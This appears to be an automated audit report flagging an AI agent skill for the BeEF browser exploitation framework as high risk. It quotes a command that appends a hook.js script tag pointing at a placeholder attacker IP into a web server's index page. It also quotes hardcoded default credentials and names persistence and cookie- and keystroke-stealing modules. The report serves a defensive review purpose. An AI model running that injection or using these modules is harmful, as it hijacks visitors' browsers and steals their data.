beef
Fail
Audited by Gen Agent Trust Hub on Sep 15, 2026
Risk Level: HIGHCREDENTIALS_UNSAFEEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPERSISTENCEDATA_EXFILTRATION
Full Analysis
- [CREDENTIALS_UNSAFE]: The skill contains multiple hardcoded default and example credentials for both the BeEF framework console and its Metasploit integration.
SKILL.md: Hardcodes default console credentials (beef/beef) and example configuration passwords (changeme).references/modules.md: Hardcodes credentials for the Metasploit RPC service (user: "msf",pass: "abc123") and REST API authentication examples.- [COMMAND_EXECUTION]: The skill provides instructions for executing commands that modify system-level web files to achieve persistence.
SKILL.md: Includes a command to append a browser-hooking script to the local web server root:echo '<script src="http://YOUR_IP:3000/hook.js"></script>' >> /var/www/html/index.html.- [PERSISTENCE]: Detailed documentation and scripts are provided for maintaining access to target browsers across sessions.
references/modules.md: Describes methods for Service Worker registration (navigator.serviceWorker.register), Invisible iFrames, and TabNabbing techniques to keep the exploitation hook active.- [EXTERNAL_DOWNLOADS]: The skill fetches the framework source code from an external repository during the installation phase.
SKILL.md: Provides instructions togit clone https://github.com/beefproject/beefand execute an installation script (./install).- [DATA_EXFILTRATION]: The skill documents the use of modules designed to exfiltrate sensitive information from hooked browsers.
references/modules.md: Lists modules for stealing cookies (Get Cookie), capturing keystrokes (Keylogger), taking screenshots, and accessing webcam/geolocation data.
Recommendations
- AI detected serious security threats
Audit Metadata